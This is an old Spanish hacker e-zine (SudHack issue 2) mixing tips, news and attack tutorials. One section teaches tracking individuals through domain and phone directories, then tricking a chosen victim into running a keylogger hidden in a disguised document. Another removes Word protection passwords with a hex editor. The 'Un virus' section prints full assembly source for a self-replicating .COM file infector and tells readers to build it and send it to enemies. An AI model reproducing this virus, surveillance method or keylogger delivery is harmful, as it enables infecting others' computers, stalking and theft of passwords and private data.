Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SudHack Issue 2

eZine's profile picture
eZine lover (@eZine)
Published in 
SudHack
 · 15 Jun 2022

11/3/2004

###  # #  ##   # #  ###  ### #  # 
        #    # #  # #  # #  # #  #   # # 
       ###  # #  # #  ###  ###  #   ## 
        #  # #  # #  # #  # #  #   # # 
     ###  ###  ##   # #  # #  ### #  #  Zine 
                         Tu comunidad Habla Hispana de Hackers

NOTA: SudHack, NI NINGUNO DE SUS REPRESENTANTES, PARTICIPANTES NI ESCRITORES, SE HACEN RESPONSABLES DEL MAL USO QUE SE LE PUEDA DAR A LA INFORMACION PUBLICADA EN ESTE E-ZINE TODOS LOS DOCUMENTOS SON DE INFORMACION Y NO PARA OCASIONAR DA—OS.


Web oficial:
http://SudHack.cjb.net

Web de la revista:
http://SudHack-zine.cjb.net

Mail oficial de colaboradores:
sudhack@sudhack.zzn.com
el-guru >>el-guru@sudhack.zzn.com
rocko >>rocko@sudhack.zzn.com
AliretH_K >>alk@sudhack.zzn.com
Keogh >>keogh@novahack.com
E.I >>cky_243@hotmail.com

Mail de la revista:
e-zine@sudhack.zzn.com

Foro oficial:
http://sudhack.foro.st

mIRC:
http://SudHack.ya.st
*irc.elsitio.com
*6667
*#SudHack

NOTA 2: Como esta comunidad se encuentra representada por personas de distintas partes del mundo me he tomado el atrevimiento de modificar algunos de los textos, para que puedan ser entendidos por personas de cualquier parte del mundo. Lo modificado serán algunos términos y no la idea del texto, o la idea en si.

INDICE

  1. EDITORIAL (BY SudHack)
  2. TRUCOS HACK (BY AliretH_K)
  3. ESPIONAJE INFORM¡TICO (BY AliretH_K)
  4. BUG EN PROTECCI”N DE WORD (By DonGato)
  5. UN VIRUS (BY el-guru)
  6. ACTUALIDAD (BY AliretH_K)
  7. COMPILADO (BY el-guru)
  8. FALLO EN WIN ME (BY AliretH_K)
  9. Hacking de Sistemas Windows 2000 a través de IPC (By DonGato)
  10. Carpetas autoejecutables en Windows XP (BY DonGat¯)
  11. TRUCOS WINDOWS 98 (BY E.I)
  12. DESPEDIDA (BY SudHack)

EDITORIAL

SudHack

Holaaaaa hackers del mundooooo!!!!
Increíble que hallamos llegado, SISISIS el segundo número de SudHack-Zine (SHT)
Espero que les halla gustado muchísimo el primer número de la revista, además esta va a ser mejor.
Les tengo que pedir perdon, se nos atrasó un poco la revista ya que teniamos la cabeza en otra cosa y cuando nos dimos cuenta el tiempo nos estaba acorralando. Así que por favor sepan disculparnos.
No iba a bajar la calidad nada mas porque la revista no esta lista y le hace falta textos.
Estoy muy contento de como repercutió SudHack en la gente, en los newbie que nos visitan y como repercutió la e-zine :) así que muchas gracias por visitar nuestras web's y por ayudarnos a crecer cada día mas.

Hemos leído y releído todos los textos para que no tengan faltas de ortografía, ya que hay alguna que otra persona, que me ha molestado mucho con eso.
No queremos que tenga expresiones que no las entiendan en otros países, esta zine será puro español :P y toda para el mundo :D y tratando de que sea con el mejor español posible Agradezo que me halla colonizado España y no Inglaterra :D

También como verán, arreglamos un poco mas los pafarros, si bien todavia no los tenemos todos totalmente derechos y alineados perfectamente tratamos de organizarlo mejor para así poderlo visualizar mejor en cualquier editor de texto.

No quiero dejar de acordarme de algunas web's que nos han apollado y ayudado, yo se que seria muy cruel mensionarlas en este momento, ya que, el apoyo fue muy grande, y seria muy comun y seguro olvidarme de algunos de ellos.

Disfruten de la e-zine...


¡¡¡¡¡¡¡¡¡¡SudHack-zine N° 2!!!!!!!!!!!!


¡¡¡¡¡NO OLVIDES VISITAR!!!!!


HTTP://SudHack.CjB.Net

HTTP://WWW.NOVAHACK.COM

HTTP://WWW.AMD-HACK.COM.AR

TRUCOS HACK

AliretH_K

Holassss...!!!
Cómo están todos, espero que bien, espero que esta sección les halla gustado, y si no es así, ya pueden pasarla por alto.
Como se darán cuenta esta sección no tiene nada de hack, pero está buena leerla para mantenerse al tanto de algunas cosas buenas y que pueden ser de gran ayuda si en algún momento de nuestras vidas.
Bueno, para no entrar en detalles ni perder tiempo, vamos a ir al truco de del día.
....


..::RESTAURAR SISTEMA::..

Si vos tenés windows ME, y tenés algo que no te guste, o te entro algún virus o algun archivo con el cual tienes problemas en tu pc, existe una forma de restaurar el sistema, es algo realmente sencillo, aunque solo sirve nada mas que para algunos días atrás.

Tenés que colocar tu disco de inicio en la disquetera y teclear "SCANREG/RESTORE" (sin comillas) (desde ms-dos). Pero como siempre existen personas que no tienen disco de inicio (MUY MALLLL) hay una opción para hacerlo desde win.

Andá a:

  • INICIO
  • PROGRAMAS
  • ACCESORIOS
  • HERRAMIENTAS DEL SISTEMA
  • RESTAURAR SISTEMA

Bueno, como verán, este truco, no es muy bueno, pero espero que les halla gustado.

Espero que siga en el próximo número. :S
:'(

ESPIONAJE INFORMATICO

AliretH_K

Bueno, voy a ser sincero con ustedes, este texto, lo estaba guardando para un libro que voy a terminar de escribir dentro de muy poco, pero no quiero que por culpa mia la e-zine se vuelva mas pobre (en sentidos de textos) así que decidi tomar un texto de mi proximo libro (Libro de oro del hacking Argentino) y colocarlo aca, espero que les guste ;)


ESPIONAJE INFORMATICO

ESTE PASO ES MUY IMPORTANTE DENTRO DEL HACKING YA QUE ES UNA DE LAS PRIMERAS COSAS, QUE TODOS LOS HACKERS DEBEN SABER.
ESTOS M…TODOS SON (NO TODOS) LIBRES, NINGUNO SE ENCUENTRA FUERA DE LA JUSTICIA, PERO SON MUY EFICIENTES, Y PUEDO ASEGURAR, QUE MAS DE UNO QUE LE DES ESTA INFORMACION SE VA A ASUSTAR, DE TUS GRANDES ACTIVIDADES Y CONOCIMIENTOS BIENVENIDO, AL VERDADERO ESPIONAJE INFORMATICO!!!

*DOMINIOS WEB

Cuando uno posee un sitio web, debe registrarse al hacer esto deja muchos datos sobre el, para afimar que su sitio es de el y pagar el hostin y los servicios, seria como tener una casa, uno tiene que colocarla a nombre de alguien y pagar impuestos.
Nadie se librará de colocar estos datos, al menos que se haga un gran trabajo, logístico y arriesgado.
Supongamos que nosotros tenemos dos amigos, y cada uno de ellos posee un sitio web en Internet.
Nuestro primer amigo, tiene una web, que su URL es www.estudio-petersen.com.ar
y nuestro segundo amigo, posee un sitio Internacional

www.hackers.com

Ahora, nosotros queremos conocer mas a

www.estudio-petersen.com.ar

Lo primero, y que es algo obvio, nos dirigimos a su web y nos daremos cuenta que se llama Gustavo Petersen.
ok, ya sabemos algo.
Como había dicho, todos nos tenemos que registrar para una web .com, o .com.ar, y en algun lugar quedan almacenados estos datos, OK, ese lugar es NIC.
Las siglas NIC quiere decir Network Information Center

Las web de NIC, son muy fáciles, de recordar y siempre fáciles de saber la url para sitios de paises es igual que una extencion internet, pero sin .com

ARGENTINA www.nic.ar
VENEZUELA www.nic.ve
CHILE www.nic.cl

y así susesibamente.

OK, vamos a la web, desde allí, vamos a consultas on-line y colocamos dentro del cuadro de díalogo

estudio-petersen.com.ar

Y nos empieza a tirar un monton de datos.... a mas no poder WWWWWOooooooWWWW, eso no es todo, supongamos que ahora queremos saber cual es el nombre de los vecinos :|
En Argentina una guía llamada Páginas Doradas, pertenece a Telefonica (creo) esta, posee un programa, que te datos de las personas, pero no todos tienen ese programa, no os preocupeis :p vamos a:

www.paginasdoradas.com.ar

Y ellos nos brindan el servicio on-line y lo de ahora ya es mas pensar, podriamos colocar el la altura de la numeración para saber como se llama el vecino, o si vive en un edificio, poniendo la direccion (sin el piso) podremos saber como se llaman todas las personas que viven en ese edificio ademas, al colocar su dirección, sabremos si la casa se encuentra a su nombre o no :|.
Muy bien, ahora que ya tenemos vastante información, pasemos a nuestro otro amigo,

www.hackers.com

Los pasos van a ir siendo los mismo, recuerdan esa super web NIC
Pero ahora como el dominio es internacional, tenemos que ir a:

www.nic.com

Y eligiremos, el link de whois.
colocamos, HACKERS.COM y otra vez, nos empieza a abarrotar de información. :D y se puede hacer lo mismo, rastrear el teléfono, de las distintas bases de datos, que existen en cada país.


*PERSONAS EN PARTICULAR

Este sistema es algo mas dificil, de realizar, ya que rastrear a una persona, con solo tener el nombre puede resultarnos, en muchas ocasiones IMPOSIBLE pero no hay que dejar de lado, que el procedimiento es realmente muy sencillo.
Al crear un correo electrónico, el 80% de las personas ponen sus datos reales en cuestion de nombre y apellido.

por ej.
estudiop@hotmail.com
DE: Gustavo Petersen
PARA: Diego Maradona <dm@elmejor.com>

Con este ejemplo tonto, quiero demostrar en la gente pone sus datos REALES :|, si, existe gente tan tonta.
URL's:
http://www.spanish.whowhere.com Español
http://www.whowhere.com Ingles
http://www.four11.com Ingles
http://www.lookup.com Español

Estas son las famosas bases de datos de las que les hablaba Con solo colocar, es país de la persona y el nombre, estas web's, te empiezan a tirar, los mail's de las personas.
Y con el mail, y ya sabemos el nombre, podemos realizar mas espionaje, como el mensionado anteriormente.
Otra forma que pudiésemos utilizar al tener la IP de una persona, conectada a Internet, es usar el comando

TRACERT 

C:\>tracert 

Uso: tracert [-d] [-h máximo_de_saltos] [-j lista_de_hosts] [-w tiempo_de_espera ] nombre_de_destino

Opciones:

  • -d No convierte direcciones en nombres de hosts.
  • -h máximo_de_saltos Máxima cantidad de saltos en la búsqueda del objetivo.
  • -j lista-de-hosts Enrutamiento relajado de origen en la lista de hosts.
  • -w tiempo_de_espera Tiempo en milisegundos entre intentos.

Este comando sigue la traza de trasnferencia de un IP con esto, pudiésemos saber (hay que romperse la cabeza) cuales son los sitios de su interés y con los cuales interactua mayor tiempo.

Ahora que ya sabemos algo, acerca de como encontrar información de otra persona, y de como obtener sus correos electrónicos.
Ahora, tendriamos que pasar a realizar lo ILEGAL Tendremos que utilizar una clase de programa.

JOINER

Y los demas quedan a nuestra elección Keylogger
o Sniffer, o sino, por que mejor los ambos :D La clase de programas, llamado JOINER es un tipo de programas que esconde, o une, la extención .EXE escondiendola en otro tipo de extención .BMP .TXT o cualquier tipo de extención. Supongamos que elegimos un Keylogger y lo unimos con otro, escondiendo la extención, y lo mandamos, como un pedido de algo (si conocemos a la persona y sabemos a que se dedica, le mandamos algo que le interese) en formato .DOC, al ejecutarlo obviamente se le ejecutara el Keylogger, que te enviará las teclas presionadas a tu correo electrónico. También podemos hacer lo mismo con algún tipo de sniffer unirlo y esconderlo en otra extención y así, hacerlo ejecutar en la PC víctima.
Tal vez escribiendo algun tipo de correo con algun link, podriamos falsificar la URL, o tal vez utilizar algun otro bug y hacer descargar el programa sin que la víctima lo supiese, eso sería para hacerlo mas creible, ya que como dato adjunto puede ser eliminado, pero mientras les mandemos cosas que a el le interese.
Por ejemplo si trabaja de algo, podemos enviarle un pedido para que nos haga algun trabajo, eso lo va a abrir si o sí y ahi se ejecuta el programa. :D
Como verán las partes en que son utilizados los programas pierde la gracia Hacker, ya que lo hacen todos los programas pero también esta bueno.
Esta sería la parte "Ilegal" ya que estaríamos invadiendo la privacidad, pero como espionaje es excelente.
Realizando esto último, sacariamos datos muy valiosos.

NOMBRES
PASSWORD
INTERESES
NUMEROS DE TELEFONOS
TRABAJOS

Podriamos realizar un excelente espionaje, aunque lo que explique antes, no esta mal, no creen. ;)

Supongamos que la persona no tiene conección a Internet en
este caso sería casi imposible.
¿Donde atacamos?
¿A quien perseguimos?
En ese caso hay que sniffear a la empresa en donde trabaja pero no se puede sacar gran provecho, a lo sumo conseguirás algún nombre, pero nada mas.

Espero que este texto les alla gustado :D y si así es este texto, imaginense como será el libro que voy a sacar :|
PD: Por eso mismo es que mis textos anteriores no fueron tan buenos, solamente ocupaba espacio para rellenar lo que faltaba ya que estaba ocupado escribiendo el libro.

BUG EN PROTECCION DE WORD

DonGato

Microsoft Word provee una opción para proteger formularios con una clave.
Esto se usa para asegurar que usuarios no autorizados no puedan manipular los contenidos de los documentos excepto dentro de áreas de "formulario" especialmente designadas. Esta característica también se usa para proteger documentos que no tienen áreas de formulario.

Los usuarios de Microsoft Word encontrarán esta opción en el menú de Herramientas / Proteger Documentos y luego seleccionando "Formularios" e ingresando una clave.

Si un documento de Word está protegido por este mecanismo, los usuarios no podrán seleccionar partes del texto o ubicar el cursor dentro del mismo, por lo tanto no podrán efectuar cambios en el documento.

Esta protección de formulario se puede remover fácilmente sin ninguna herramienta adicional mas que un editor hexadecimal.

Descripción:

Al guardar un documento protegido de Word como html, Word agrega un "checksum" (suma de chequeo) de la clave al código.
El formato del checksum se ve como CRC32 pero actualmente no hay mas detalles disponibles. Este checksum se puede encontrar dentro de el documento original de Word abriéndolo con un editor hexadecimal. Si este checksum es reemplazado por 0x00000000 la clave equivale a un string (cadena) vacío.

Ejemplo:

Abra un documento protegido en MS Word
Guárdelo como Página web (*.htm ó *.html) y cierre Word Abra el documento html en un editor de texto (bloc de notas, por ejemplo)
Buscar "<w:UnprotectPassword>", en la línea se leerá algo como:

<w:UnprotectPassword>ABCDEF01</w:UnprotectPassword>

Memorice el password (clave)

Abra el documento original (doc) con un editor hexadecimal Busque los valores hexadecimales de la clave (orden inverso)
Sobrescriba todos los cuatro bytes dobles con 0x00, guarde y cierre.
Abra el documento con MS Word, seleccione Herramientas / Desproteger documento (clave en blanco)

Variación:

Si los ocho bytes de checksum se reemplazan con el checksum de una clave conocida sería muy fácil desproteger el documento, haga todos los cambios necesarios, guarde, cierre y restablezca la clave a su valor original (desconocido), solo restaurando los valores originales. El documento fue cambiado sin siquiera conocer la clave.

Nota VSA: En nuestras pruebas, el procedimiento parece no funcionar en todas las versiones de Word.

UN VIRUS

el-guru

En este pequeño lugar del E-Zine quiero explicar lo que es un virus así de como se constituye y como un virus sigue siendo un programa, tambien como evitar infectarse por E-Mail... principalmente en Hotmail que tu mail siempre esta expuesto ahí por las famosas cadenas.

Basico:

Antes de empezar a soltar el rollo voy a hacer, unas pequeñas definiciones sobre el mundo de los virus, es mas que nada para los que no tengan idea de casi nada de este mundo.

  • VIRUS: Es un pequeño programa generalmente escrito en cualquier tipo de lenguaje
  • (desde Visual Basic - hasta Esamblador), y sabras que un Virus es un simple programa.
  • Troyano: Es un programa legal (en apariencia) que lleva en su interior un codigo dañino en cuestion, a diferencia de un virus este no se autoreplica solo se ejecuta una vez (y ya es suficiente para que acabe con tu disco ó de acceso a gente agena por puertos que el Troyano habré, Por el momento uno de los mas famosos y que recomiendo ampliamente usar es el LiTTleWitCH.
  • Gusano ó Worm: Es un programa que se desplaza por la memoria del ordenador (RAM), busca zonas de memoria desocupadas en las que realiza copias repetidas hasta provocar un desbordamiento de memoria se usan mayoritariamente en redes, uno de los mas famosos por el momento es el BLASTER.
  • Bomba Lógica: Es un pequeño programa que permanece, oculto y ni se autoduplica ni se desplaza en memoria, tan solo espera a que llegue una fecha determinada o que alguien ejecute una orden y entonces se activa el proceso desmadrador!!!.

Bien es hora de pasar a lo que realmente interesa el principio de un virus. Solo se necesita saber algo de programacion, y ganas de aprender ya vereis que al final no es tan dificil hacer un virus simple y a partir de ahi mejorarlo.


¿Como actua un Virus?

  • Busca un fichero para infectar (*.exe, *.com etc...)
  • Lo abre y comprueba el tipo de fichero, tamaño y si esta infectado.
  • Si esta infectado, lo cierra y busca otro
  • En el punto anterior si no esta infectado lo infecta
  • Y así sigue hasta que destroza las PC's.

Llego la hora del ejemplo. Es un virus llamado PIX, quiza no es muy famoso y mucho menos una maravilla de virus, pero sirve de ejemplo.

!!!Nota: Si lo haces fichero *.COM con el DEBUG de Windows el virus estara activo, asi que si lo ejecutas pues ¿que crees que pase?

NPIX.COM 
A 
JMP 0116 
DB 90,49,56,00,2A,2E,43,4F,4D,00,4F,04,00,00,01,00,00,00,00,00 
MOV AX,CS 
ADD AX,1000 
MOV ES,AX 
INC BYTE PTR [0105] ; Incrementa el contador de generaciones. 
MOV SI,0100 
XOR DI,DI 
MOV CX,014F 
REPZ 
MOVSB 
MOV DX,025F 
MOV AH,1A 
INT 21 ;Se encarga de crear el DTA para los ficheros... 
MOV DX,0106 ;con extension *.COM 
MOV CX,0018 
MOV AH,4E 
INT 21 
JB 019E 
MOV DX,027D 
MOV AX,3D02 ;Abre el fichero en modo lectura/escritura. 
INT 21 
MOV [0114],AX 
MOV BX,AX 
PUSH ES 
POP DS 
MOV DX,034F 
MOV CX,FFFF 
MOV AH,3F 
INT 21 
ADD AX,034F 
CS: 
MOV [0112],AX ;A continuacion, la firma del virus: 
dB 3E,81,3E 
DB 52,03 
DB 49,56 
JZ 0188 
XOR CX,CX 
MOV DX,CX 
CS: 
MOV BX,[0114] 
MOV AX,4200 
INT 21 ;Desplaza el puntero. 
JB 0188 
MOV DX,0000 
CS: 
MOV CX,[0112] 
CS: 
MOV BX,[0114] 
MOV AH,40 
INT 21 ;Salva virus y programa contaminado. 
CS: 
MOV BX,[0112] 
MOV AH,3E 
INT 21 ;Cierra el fichero. 
PUSH CS 
POP DS 
MOV AH,4F 
MOV DX,025F 
INT 21 
JB 019E 
JMP 013E 
MOV DX,0080 
MOV AH,1A 
INT 21 ;Restaura el DTA original. 
CMP BYTE PTR [0105],05 ; ®Quinta verción?... 
JB 0207 ; Si es asi, comienza el espectaculo. 
MOV AX,0040 
MOV DS,AX 
MOV AX,[006C] ; Aleatoriedad de manifestacion del virus... 
PUSH CS ; mediante el registro de decimas de segundo. 
POPDS 
AND AX,0001 
JZ 0207 
MOV DX,01C4 
MOV AH,09 
INT 21 
INT 20 ; A continuacion, el mensaje del virus. 
DB 59,4F,55,52,20,50,43,20,48,41,56,45,20,41,20,4D,45,53,53,41,4A,52 
DB 20,46,4F,52,20,59,4F,55,20,3A,20,4A,4F,44,45,54,45,20,59,20,45,53 
DB 50,45,52,41,20,43,41,4D,49,4C,4F,20,4A,4F,53,45,20,43,45,4C,41,2E 
DB 24 
MOV SI,0224 
MOV CX,002B 
XOR DI,DI 
REPZ 
MOVSB 
XOR DI,DI 
CS: 
MOV WORD PTR [010E],0000 
CS: 
MOV [0110],ES 
CS: 
JMP FAR [010E] 
PUSH DS 
POP ES 
MOV SI,044F ;el-guru sigue explicando xD~~ 
CMP BYTE PTR [0105],01 
JNZ 0234 
SUB SI,0200 
MOV DI,0100 
MOV CX,FFFF 
SUB CX,SI 
REPZ 
MOVSB 
CS: 
MOV WORD PTR [0100],0100 
CS: 
MOV [0102],DS 
CS: 
JMP FAR [0100] ; Salto a la ejecucion del verdadero programa... 
INT 20 ; siempre que se trate de una generacion... 
INT 20 ; posterior a la primera, y por tanto, exista. 
DB 0,0 

R CX 
154 
W 
Q

!!!Nota: Este punto será de suma importancia ya que te diré como activarlo,para vengarte de enemigos solo copia el texto anterior pero quítal e los ;opninion y copialo en un archivo despues pasalo al Edit de Windows que esta en C:\Windows\System32\edit.exe y ahi pasalo despues lo guardas con extencion .com es decir VIRUS.COM ó PIX.COM HOTMAIL.COM, despues habre MS-DOS de Windows y coloca: DEBUG y entres despues saldrá una Linea

- (donde colocas) DEBUG < c:\misarchivos\VIRUS.COM y Listo!!! a enviar

ACTUALIDAD

AliretH_K

*Filtraciones del código fuente de Windows NT y 2000


Microsoft reconoce en una escueta nota de prensa estar investigando la publicación en Internet de porciones incompletas del código fuente de Windows NT y Windows 2000. En lo que a seguridad se refiere, la filtración de su código fuente podría facilitar la detección y explotación de nuevas vulnerabilidades en Windows.

Lo que empezó como un rumor en algunos foros de Internet parece que se confirma con el paso de las horas, si bien aun no se ha hecho público ningún análisis riguroso que demuestre que realmente se trata de porciones del código fuente de Windows, a que módulos corresponderían, y las implicaciones en materia de seguridad que esta filtración podría ocasionar.
Sin embargo, el hecho de que Microsoft trate el asunto de forma oficial, con declaraciones de portavoces y publicación de nota de prensa en su web, apuntan a la veracidad del incidente.

Los únicos detalles que se conocen por el momento es la circulación por varias redes P2P de un archivo comprimido de 203.84 Megabytes,"windows_2000_source_code.zip", conteniendo 660MB de código fuente, y que está difundiéndose a gran velocidad. También hemos constatado que el contenido de este archivo ya circula por otras redes y en diferentes formatos.

Aun es pronto para hacer valoraciones sobre las implicaciones reales que este incidente podría tener. A la falta de un análisis minucioso del código que circula, lo que podría llevar bastante tiempo, todo lo que se maneja son vagas hipótesis.


*Microsoft hackeada por hackers que ahora revelan sus secretos

Pasado el susto al esperar un ataque del temible virus informático "Mydoom.B", que al final no se produjo, Microsoft, el imperio de Bill Gates debió reconocer públicamente que una parte del código secreto de Windows NT y 2000 fue puesto ilegalmente en la red abriendo puertas que podrían ser utilizadas por los hackers para ingresar en las computadoras de sus usuarios, aunque Microsoft minimizó el inconveniente.

EL COMUNICADO

La empresa que lidera el multimillonario Bill Gates aceptó ayer que una parte de los códigos de sus sistemas Windows NT y 2000 circula por la red lo que podría perjudicar a Microsoft al desnudar posibles debilidades en sus sistemas lo que permitiría crear virus más poderosos, además de posibilitar que se copien ilegalmente.

Además de estos peligros, quienes obtuvieran los códigos podrían ingresar en las computadoras que los utilizan, lo que aumenta a millones el número de posible víctimas.

En un comunicado dado a conocer con fecha del jueves, aclara que estos datos representan sólo una mínima porción de las millones de líneas usadas para crear sus productos.

En su comunicado, la empresa de Gates trató de llevar tranquilidad a sus usuarios asegurando que no se verán perjudicados por la intromisión.


EL SUSTO PASADO

Hace algo más de una semana, la aparición de un virus, el Mydoom.A, conmovió el mundo informático. Inutilizó cientos de miles de computadoras, incluyendo redes empresarias. Pasado el susto, se anunció que el Mydoom.B estaba listo para atacar Mycrosoft lo que puso en alerta a la empresa de Gates que ha hecho de la defensa del secreto de sus sistemas una política que terminó en la Justicia. Pero el ataque no se concretó.

El martes pasado, la compañía Panda Software informó de la aparición de "Doomjuice.A", un nuevo virus informático preparado para distribuirse como un "gusano de red" de forma peligrosa, ya que no es detectable ni visible al usuario a través del correo electrónico como otros virus, dado que se aprovecha de los puertos abiertos por "Mydoom.A" y "Mydoom.B".

Según las mismas fuentes, los autores de este nuevo virus pueden ser los mismos que los creadores de "Mydoom.A", un "gusano" que sigue causando infecciones en los sistemas informáticos.


*Nokia admite fallos de seguridad en teléfonos móviles con Bluetooth

Nokia ha admitido que varios de sus modelos de teléfonos móviles son vulnerables a ataques de "bluesnarfing", método por el cual alguien puede introducirse en nuestro móvil y copiar, ver o incluso modificar ciertas partes como la guía telefónica o el calendario, todo ello se realiza desde un dispositivo cercano sin alertar en ningún momento al propietario.

Bluetooth es un sistema de comunicaciones inalámbricas de corto alcance, su uso en todo tipo de dispositivos móviles empieza a ser generalizado (lo podemos encontrar integrado en cualquier teléfono móvil de gama media).

El uso convencional de esta tecnología es principalmente el intercambio de datos entre dispositivos cercanos (10 metros) evitándonos el uso de cables.
Su adopción nos está trayendo consigo un nuevo vocabulario de palabras muy sonoras tales como "bluesnarfing" (anteriormente mencionada) o "bluejacking", que consiste en el envío de mensajes anónimos a dispositivos cercanos(entiéndase como una nueva forma de bombardearnos con mensajes indeseados).

La confirmación de los problemas de seguridad por parte de Nokia llega tras hacerse público que el bluesnarfing afectaba gravemente a varios de sus modelos (Nokia 6310, 6310i, 8910 y 8910i) así como en menor medida a otros modelos de Sony Ericsson y Ericsson.

Uno de los problemas se centra en la posibilidad de que alguien de nuestro entorno cercano pueda acceder a la información contenida en nuestro dispositivo a pesar de que esté configurado en modo "invisible", para ello existen ya varias herramientas en la red que permiten encontrar los dispositivos mediante el uso de fuerza bruta.

El problema más grave que afecta al Nokia 7650 y al 6310i (este último sin confirmar por la compañía) y permitiría en envío de SMS y la navegación web de terceros terminales a través de los modelos afectados.

Por último el modelo Nokia 6310i permite un ataque de denegación de servicio mediante el envío de un mensaje bluetooth especialmente construido, lo que provocará el reinicio del terminal.

Nokia ha negado que vaya a arreglar estos problemas y aconseja a los usuarios de sus teléfonos la activación del modo "invisible" cuando se encuentren en lugares públicos.


*Un 90% de las aplicaciones web son inseguras

Según un estudio realizado durante los últimos cuatro años por WebCohort, tan solo un 10 por ciento de las aplicaciones web pueden considerarse seguras ante cualquier tipo de ataque.
En estos datos se incluyen sitios de comercio electrónico, banca online, B2B, sitios de administración, etc.

Los estudios realizados han concluido que al menos un 92% de las aplicaciones web eran vulnerables a algún tipo de ataque. Los problemas más comunes son las vulnerabilidades de cross-site scripting (80%), inyección SQL (62%) y falsificación de parámetros (60%). En las auditorías realizadas por Hispasec Sistemas también hemos podido comprobar como este tipo de problemas son más habituales de lo que cabría desear, lo que evidencia que la mayoría de las empresas no aseguran adecuadamente sus sitios web, aplicaciones y servidores contra cualquier tipo de intrusión.

La gravedad de estos problemas reside en como los ataques se realizan contra la propia aplicación web, el uso de las defensas habituales como firewalls, detectores de intrusos, etc. en la mayoría de los casos se muestran ineficientes. Los atacantes podrán acceder a datos de usuarios, de la empresa, detener sitios web, modificar la información del sitio web, e incluso llegar a ejecutar comandos en el servidor sin ser detectado en ningún momento.

Ya en el 2001, Gartner Group anunció que el 75% de los ataques informáticos a través de Internet eran realizados a través de las aplicaciones web.
En la actualidad es fácil comprobar como persiste el mismo problema.


*Nueva vulnerabilidad en los Kernel Linux

Se acaban de publicar las versiones 2.4.25 y 2.6.3 del kernel Linux, que solucionan un grave problema de seguridad.

Las versiones previas del kernel contienen una vulnerabilidad en la función "do_mremap" que permite que cualquier usuario local obtenga privilegios arbitrarios o provoque la caída del sistema.

Todos los administradores de máquinas Linux deberían actualizar a los kernels 2.4.25 o 2.6.3, especialmente si sus usuarios pueden ser maliciosos. La versión 2.2.25 también es vulnerable pero, de momento, no se ha publicado ninguna actualización.

Recordamos nuevamente la conveniencia de descargar las actualizaciones desde puntos de Internet confiables, para evitar el riesgo de caballos de Troya o alteraciones maliciosas o defectuosas.


*Actualización para el reproductor Windows Media

Microsoft ha publicado una actualización que corrige algunos errores del comportamiento de las secuencias de comando URL de su conocido reproductor Windows Media.

Esta actualización viene a corregir unos problemas por los que un atacante podría agregar una secuencia de comandos en un archivo de sonido o vídeo con lo que conseguiría forzar a un usuario que intente ejecutar estos archivos a conectar con una página web determinada. Según fuentes de Microsoft este comportamiento es una característica de diseño.

Específicamente, la actualización modifica el Reproductor de Windows Media para que reconozca tres nuevos valores del Registro que permiten a un usuario o a un administrador controlar la situaciones en las que el reproductor ejecutará secuencias de comandos URL que se hallen incrustados.

Productos afectados:

  • Microsoft Windows Media Player 9 Series for Windows XP
  • Microsoft Windows Media Player 9 Series for Windows 2000
  • Microsoft Windows Media Player 9 Series for Windows Millennium Edition
  • Microsoft Windows Media Player 9 Series for Windows Server 2003
  • Microsoft Windows Media Player for Windows XP Home Edition
  • Microsoft Windows Media Player for Windows XP Professional
  • Microsoft Windows Media Player 7.1
  • Microsoft Windows Media Player 6.4

*Escalada de privilegios en función del API de Microsoft Windows XP

Se han detectado diversas vulnerabilidades en una función nativa del API (Application Program Interface) del núcleo de Windows XP que permitiría a un usuario con el privilegio SeDebugPrivilege ejecutar código en modo kernel, además de poder leer y escribir de cualquier dirección de memoria, incluyendo la ocupada por el kernel.

El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC).

La función ZwSystemDebugControl(), exportada de ntdll.dll, llama a una función del sistema llamada NtSystemDebugControl(), que es ejecutada en modo kernel, y que se creó para ser utilizada por depuradores con el privilegio SeDebugPrivilege.

La primera vulnerabilidad permite modificar el registro MSR (Model-Specific Register) IA32_SYSENTER_EIP para apuntar al código deseado y que posteriormente se ejecute con el control total del procesador.

La segunda permite modificar una entrada IDT (Interrupt Dispatch Table) con un puntero hacia el código deseado y ejecutar una instrucción INT n (interrupción del sistema). Un problema de comprobación de una estructura implicada en el proceso permite la escritura en memoria de kernel.

La tercera es similar a la anterior, pero utiliza las sub-funciones DebugSysReadBusData/DebugSysWriteBusData para modificar el IDT.

La cuarta aprovecha que dado que el programa en modo usuario tiene acceso directo a hardware, también puede leer y escribir memoria del kernel con la ayuda de hardware que tenga acceso a la RAM del procesador. Es un proceso similar al segundo y tercero, pero más complejo.

A efectos prácticos, un usuario con el privilegio anteriormente nombrado podría ejecutar código arbitrario como si fuera del kernel, además de leer y escribir cualquier dirección accesible por el mismo.
El programa podría hacer cualquier cosa que el núcleo pueda realizar, como reprogramar el hardware del sistema, como la BIOS, o parchear el kernel en memoria.
Hay que tener en cuenta que para explotar este problema se requiere el privilegio SeDebugPrivilege, normalmente dado sólo a administradores, por lo que el nivel de riesgo es reducido.
La posesión de este privilegio es suficiente para comprometer el sistema por su diseño intrínseco.

Como medida sencilla de precaución, se recomienda conceder dicho privilegio sólo a usuarios de confianza.

Se tiene constancia de la existencia de códigos de prueba de concepto que aprovechan este problema.

*Vulnerabilidad en ZoneAlarm por error en tratamiento de SMTP

Se ha descubierto una vulnerabilidad en determinadas versiones de ZoneAlarm, ZoneAlarm Pro, ZoneAlarm Plus y el cliente de Zone Labs Integrity. Dicha vulnerabilidad se debe a la falta de comprobación de un búfer utilizado en el procesamiento del protocolo SMTP (Simple Mail Transfer Protocol). Esta falta de comprobación puede aprovecharse para provocar un desbordamiento de búfer. Para poder explotar esta vulnerabilidad sin la ayuda del usuario, el sistema debe estar funcionando como servidor SMTP.

ZoneAlarm es un clásico de los firewall personales para entornos Windows que principalmente realiza dos funciones: evitar el acceso no autorizado desde el exterior hacia el ordenador donde está instalado el cortafuegos e identificar que aplicaciones acceden a recursos externos. La compañía ZoneLabs no recomienda usar sus productos de seguridad orientada a cliente en la tarea de proteger servidores.

La explotación con éxito de la vulnerabilidad (descubierta por eEye Digital Security) puede provocar el cese de procesamiento del tráfico del firewall, la ejecución de código arbitrario o la escalada de privilegios.

Para poder explotar el problema hace falta que se presente alguna de estas situaciones:

  • Un programa ha de estar escuchando en el puerto 25/TCP del sistema. Esta condición suele darse solo en máquinas con servidores de este protocolo, ya que usan ese puerto por defecto.
  • Un programa malicioso corriendo en el sistema protegido podría provocar un desbordamiento de búfer y realizar una escalada de privilegios si el administrador le ha dado permisos para acceder a la red. En cualquiera de los casos, el programa que pida acceso a la red ha de ser aprobado por el usuario en la política de control de programas.

